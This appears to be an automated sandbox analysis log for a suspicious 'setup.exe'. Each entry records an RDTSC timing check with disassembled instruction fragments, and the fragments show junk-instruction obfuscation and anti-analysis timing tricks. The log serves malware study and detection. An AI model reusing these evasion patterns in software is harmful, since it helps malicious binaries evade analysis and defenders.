Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3F5DD second address: E3F626 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FF32CFB71F8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 movsx esi, si 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 pushad 0x00000029 jmp 00007FF32CFB7206h 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 push eax 0x00000032 push edx 0x00000033 push edx 0x00000034 pop edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E41D07 second address: E41D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E42454 second address: E4245A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4245A second address: E42460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E42460 second address: E42464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E44280 second address: E44286 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E44286 second address: E44290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF32CFB71F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E44290 second address: E442F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007FF32CDD656Bh 0x00000010 jmp 00007FF32CDD6572h 0x00000015 pop edi 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+1246ED0Ch], ecx 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007FF32CDD6568h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 00000017h 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a mov dword ptr [ebp+122D1C24h], ebx 0x00000040 sub di, 5FBFh 0x00000045 xchg eax, ebx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push ebx 0x0000004a pop ebx 0x0000004b pushad 0x0000004c popad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E442F6 second address: E442FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E46012 second address: E46016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E49048 second address: E49050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4AC52 second address: E4AC6C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF32CDD656Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4AC6C second address: E4AD06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF32CFB7202h 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FF32CFB71F8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 call 00007FF32CFB7206h 0x0000002c sbb bx, 52BFh 0x00000031 pop edi 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+12460B16h], ebx 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007FF32CFB71F8h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 jng 00007FF32CFB71F8h 0x0000005c mov bl, 0Dh 0x0000005e xchg eax, esi 0x0000005f push eax 0x00000060 push edx 0x00000061 jnl 00007FF32CFB71F8h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4DBB0 second address: E4DBB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4CDFA second address: E4CE01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4CF0B second address: E4CF11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4FCD6 second address: E4FCE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF32CFB71F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4FCE0 second address: E4FD4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF32CDD6573h 0x0000000e nop 0x0000000f pushad 0x00000010 mov esi, 520426D3h 0x00000015 call 00007FF32CDD6573h 0x0000001a mov dword ptr [ebp+12460B16h], edi 0x00000020 pop ecx 0x00000021 popad 0x00000022 push 00000000h 0x00000024 mov dword ptr [ebp+124610CAh], edx 0x0000002a push 00000000h 0x0000002c jns 00007FF32CDD6566h 0x00000032 jnl 00007FF32CDD656Bh 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b jmp 00007FF32CDD6571h 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4FE41 second address: E4FE47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4FE47 second address: E4FE51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF32CDD6566h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E51D05 second address: E51D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FF32CFB71FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E52E67 second address: E52E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF32CDD6574h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E52E82 second address: E52E86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E53F2D second address: E53F32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E53F32 second address: E53F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E55005 second address: E55076 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 ja 00007FF32CDD6566h 0x0000000d pop eax 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FF32CDD6568h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e sub ebx, dword ptr [ebp+122D26A2h] 0x00000034 mov bx, B540h 0x00000038 push 00000000h 0x0000003a mov di, 2F00h 0x0000003e xchg eax, esi 0x0000003f jbe 00007FF32CDD6574h 0x00000045 push eax 0x00000046 jg 00007FF32CDD6581h 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FF32CDD656Fh 0x00000053 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E55076 second address: E5507A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E51F22 second address: E51FD4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD6576h 0x00000008 jmp 00007FF32CDD6570h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 cld 0x00000013 mov di, FC51h 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov edi, dword ptr [ebp+122D32D3h] 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007FF32CDD6568h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000014h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 call 00007FF32CDD656Fh 0x0000004a mov ebx, dword ptr [ebp+122D30C0h] 0x00000050 pop edi 0x00000051 mov eax, dword ptr [ebp+122D0F39h] 0x00000057 push 00000000h 0x00000059 push edi 0x0000005a call 00007FF32CDD6568h 0x0000005f pop edi 0x00000060 mov dword ptr [esp+04h], edi 0x00000064 add dword ptr [esp+04h], 0000001Ch 0x0000006c inc edi 0x0000006d push edi 0x0000006e ret 0x0000006f pop edi 0x00000070 ret 0x00000071 mov bx, dx 0x00000074 push FFFFFFFFh 0x00000076 je 00007FF32CDD656Ch 0x0000007c sub ebx, dword ptr [ebp+122D2BBFh] 0x00000082 nop 0x00000083 push eax 0x00000084 push edx 0x00000085 jmp 00007FF32CDD656Ch 0x0000008a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E56033 second address: E56038 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E56038 second address: E56091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF32CDD6566h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FF32CDD6568h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push 00000000h 0x0000002a adc di, 19A0h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007FF32CDD6568h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b xchg eax, esi 0x0000004c push ecx 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5526D second address: E55271 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E57011 second address: E57040 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FF32CDD6577h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF32CDD656Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5FFE6 second address: E5FFF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5FB87 second address: E5FB97 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF32CDD6566h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5FB97 second address: E5FB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5FB9D second address: E5FBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5FBA1 second address: E5FBB5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FF32CFB71FBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5FBB5 second address: E5FBC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5FBC0 second address: E5FBC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E63110 second address: E63137 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6575h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007FF32CDD6568h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E63137 second address: E6313D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E6313D second address: E63165 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 jmp 00007FF32CDD6576h 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E63165 second address: E6318B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007FF32CFB7204h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E63291 second address: E6329C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF32CDD6566h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E633D0 second address: E633D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E633D4 second address: E633D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E633D8 second address: E633E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007FF32CFB71F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E633E7 second address: E633FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF32CDD656Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E633FC second address: E6343A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7203h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF32CFB7209h 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jng 00007FF32CFB71FCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E6343A second address: E63451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FF32CDD6570h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E63451 second address: E63484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007FF32CFB7200h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF32CFB7203h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E63484 second address: E6349C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6574h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E648C4 second address: E648E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7205h 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DF22DD second address: DF22E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E6CEEE second address: E6CEF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E6DA5C second address: E6DA62 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E6DA62 second address: E6DAA9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF32CFB71F8h 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FF32CFB71FAh 0x00000015 jmp 00007FF32CFB7201h 0x0000001a jmp 00007FF32CFB7206h 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E6DAA9 second address: E6DAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E72849 second address: E7284F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E7284F second address: E7286F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF32CDD6566h 0x00000008 jmp 00007FF32CDD656Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DFA8C5 second address: DFA8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DFA8D0 second address: DFA8D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DFA8D4 second address: DFA8DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DFA8DA second address: DFA8DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3CE6A second address: E3CE6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3CE6E second address: E1FA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FF32CDD6568h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov edx, dword ptr [ebp+122D3504h] 0x0000002a lea eax, dword ptr [ebp+12481B8Bh] 0x00000030 xor edx, dword ptr [ebp+122D35A0h] 0x00000036 mov di, 14FDh 0x0000003a nop 0x0000003b jmp 00007FF32CDD6572h 0x00000040 push eax 0x00000041 ja 00007FF32CDD656Ah 0x00000047 push esi 0x00000048 pushad 0x00000049 popad 0x0000004a pop esi 0x0000004b nop 0x0000004c clc 0x0000004d call dword ptr [ebp+122D2BBFh] 0x00000053 push edi 0x00000054 jmp 00007FF32CDD6570h 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3CF65 second address: E3CF6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D303 second address: E3D309 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D309 second address: E3D30F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D3A5 second address: E3D3AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FF32CDD6566h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D558 second address: E3D574 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7208h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D6C8 second address: E3D6CD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D6CD second address: E3D6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FF32CFB71FEh 0x00000010 mov eax, dword ptr [eax] 0x00000012 push edx 0x00000013 jg 00007FF32CFB71FCh 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D8EF second address: E3D8F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D8F3 second address: E3D8F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D8F7 second address: E3D8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D8FD second address: E3D903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D903 second address: E3D915 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FF32CDD6566h 0x00000012 rdtsc
